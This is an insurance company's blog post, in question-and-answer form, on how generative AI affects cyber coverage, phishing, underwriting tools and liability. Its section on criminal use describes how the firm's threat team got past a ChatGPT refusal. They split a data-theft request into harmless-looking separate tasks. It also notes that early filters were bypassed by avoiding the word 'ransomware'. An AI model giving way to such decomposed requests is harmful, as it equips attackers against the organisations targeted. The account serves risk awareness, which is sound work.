<img height="1" width="1" style="display:none;" alt="" src="https://px.ads.linkedin.com/collect/?pid=1354242&amp;fmt=gif">

Generative AI is here. How does it impact cyber insurance?

ChatGPT — the AI fueled chatbot you keep reading articles about — reached 100 million monthly active users only two months after its launch. For context, it took Twitter two years to reach one million. Seemingly overnight, businesses started turning to ChatGPT en masse to increase efficiency. 

Even traditional insurance carriers, not known for accepting change with open-arms, are implementing generative AI for customer service chatbots and claims filing. (More on what we’re doing at Corvus later). 

If even digitally-averse industries are acclimating to life with ChatGPT, it comes as no surprise that threat actors are finding ways to capitalize on it for malicious activities. And as more and more of us turn to generative AI to do some of the heavy-lifting at our day jobs, we face increasing uncertainties. Could this lead to Large Language Models accessing sensitive data? What’s the impact on cyber coverage? How can organizations responsibly use generative AI? How do we manage cybersecurity and generative AI to prevent cyber incidents? 

We compiled common questions we’re hearing from brokers, like the ones above, and our insurance and security experts answered (so no, you don’t have to go ask ChatGPT).

Common Insurance & Security Questions About ChatGPT:

 

Q: Will organizations that use ChatGPT see it impact their cyber coverage?

As of right now, you probably won’t see any questions on cyber insurance applications related to ChatGPT or generative AI. While more and more organizations are finding ways to implement these new technologies into their workflows to save time and resources, it’s by no means integral to the functioning of day-to-day processes within most business classes (yet). 

We’re risk-averse by trade, so we suggest that all organizations beginning to incorporate ChatGPT do so with caution. Generative AI can be an incredibly helpful tool — with the right oversight from human experts and best practices for cybersecurity risk management.

For example, professional service firms are exploring ways that ChatGPT can augment their staff. But if a client reaches out to their accountant, or a cybersecurity expert, looking for personalized advice and AI is used to answer, can we trust that it’ll be as consistently accurate (or thorough) as a response from a licensed human with years of training and experience?

“Something to consider is if your E&O insurance company will back your usage of ChatGPT down the line,” explains Pete Hedberg, Vice President of Cyber Tech E&O Underwriting. “As rapid adoption continues, insurers will need to look at how effective it is and then determine how to carve out coverage going forward. I expect we’ll see changes coming soon, which is a profound statement in the world of insurance, where things move slowly and carefully.”

Q: How are cybercriminals using ChatGPT to their advantage? What should we watch for?

Generative AI is shaking up some long-held convictions around cybercriminals. For one, poor spelling and grammar have traditionally been telltale signs of a phishing email, composed by threat actors who aren’t native English speakers. But with the assistance of ChatGPT — which is adept at making content that looks like it was written by a human —  a keen eye will be necessary for spotting scams such as phishing attacks. 

ChatGPT is lowering the barrier to entry for a career cybercriminal, and the dark web is taking notice; there were more than 4,000 mentions of ChatGPT in underground cybercriminal forums in February alone. Now, threat actors don’t need to be particularly fluent in English or in coding languages to successfully deceive and profit off of organizations. Not only are phishing emails becoming more convincing, but technical novices are only a few minutes of investment away from creating malware with ChatGPT. 

In response to the worrying trend of criminal misuse, OpenAI enacted several filters and restrictions that would prevent users from requesting a ransomware binary (originally, any request worked as long as you did not use the word “ransomware”). Now, it’s a little trickier — but threat actors are actively exploring workarounds for these types of threats.

“In the dark web early on, we were seeing a lot of creative ideas about all the malware you could write with the assistance of ChatGPT. Now, a main focus of conversation is how to bypass censorship filters,” says Ryan Bell, Threat Intelligence Manager. 

The Corvus Threat Intelligence team investigated how well ChatGPT’s restrictions worked. While their original request outlining the steps of a simple data theft attack was denied and interpreted as unethical behavior, the team quickly found a workaround for the security controls. When they separated their requests into individual tasks, ChatGPT happily obliged.

[DIAGRAM] ChatGPT Python Snippet

[DIAGRAM] ChatGPT Python Snippet #2

“By themselves, these steps are innocuous. But we’re dealing with an algorithm here, not a human being. It’s still possible to trick ChatGPT into doing things that you probably shouldn’t be doing,” adds Bell.

Q: Are cyber underwriters using generative AI at Corvus? 

Administrative, non-core tasks take up 40 percent of an underwriters’ time, reports Microsoft. With days bogged down by chaotic workflows, overflowing inboxes, and demanding data input, an obvious question presents itself — much like other industries that have turned to AI to lighten their workloads — how can we adopt new tools to focus on what really matters? 

The answer isn’t as simple as budgeting for new technical solutions. In fact, 64% of underwriters told Accenture that technology has increased their workload or made no difference. One said: “It helps with better decision making, but it adds time for each submission to open and use all the new tools.” 

To create room for underwriters to focus where their expertise is necessary, like broker relationships, converting valuable opportunities, and long-term book growth, we’re collaborating cross-functionally with security teams and underwriters to create solutions that simplify tasks where we can.

The Corvus Risk Navigator platform places real-time suggestions into the underwriting workflow based on a matrix of data including firmographics, threat intelligence, claims and peer benchmarking.  Our most recent updates to the smart insurance platform increase the degree of automation of low-value tasks in the underwriter’s workflow, leveraging the latest development in AI using Large Language Models (LLMs), natural language processing (NLP) and object recognition. 

This removes the need for underwriters to validate industry classifications by manually reviewing organizational websites (a necessary step for determining risk); AI performs the heavy-lifting by examining the website and classifying the industry, serving as a much-needed underwriting assistant.

Q: Could the use of ChatGPT lead to claims down the line?

 

There are two major concerns on the horizon:

  1. Organizations will share personally identifiable information without consent to a large language model’s developer.
  2. Professional service firms will use ChatGPT to provide advice to clients (that traditionally comes from licensed experts) and ChatGPT will give bad advice. 

While significant measures haven’t been taken yet, organizations should be prepared to answer questions about how they are using AI — specifically related to what privacy provisions and cyber mitigation tactics they have in place — within the next year. Entering personally identifiable information to the free version of ChatGPT, even something as non-descript as an IP address, may unwittingly violate data protection laws by sending information to OpenAI without consent. 

Cyber insurers are going to want to know if organizations are using any sort of generative AI, that they have contracted this use and negotiated the appropriate terms and conditions to secure data privacy. This is especially important, as wrongful collection of data claims continue to skyrocket. Litigation has primarily been tied to the use of ad-tracking technology on healthcare websites or the Biometric Information Protection Act, but as ChatGPT gains notoriety, it is likely that irresponsible usage will lead to a new avenue for data privacy lawsuits. 

To address the latter concern — businesses may be liable for providing bad information — consider an instance where a doctor uses a medical device to complete a surgery, and the device fails.

“It’s going to be the doctor that faces a negligence lawsuit,” Hedberg says. “I don’t think there will be an instance where a professional service firm can say that ChatGPT provided the wrong information and then skirt the blame. It was their professional decision to use ChatGPT that led to the alleged damages.” 

Recent Articles

Change Healthcare Hack: Everything You Need To Know


Change Healthcare experienced a ransomware attack with unprecedented fallout. What happened, and what have we learned?

Women in Cyber: Advice from the Field


In honor of Women’s History Month, we connected with women making significant contributions to cyber for career advice, lessons from the field, and more.

Law Enforcement Can Help in a Cyber Crisis — But Prevention is Even Better


Law enforcement is thwarting threat actors on the dark web, but how can organizations lay a strong security foundation (with or without the FBI's help?).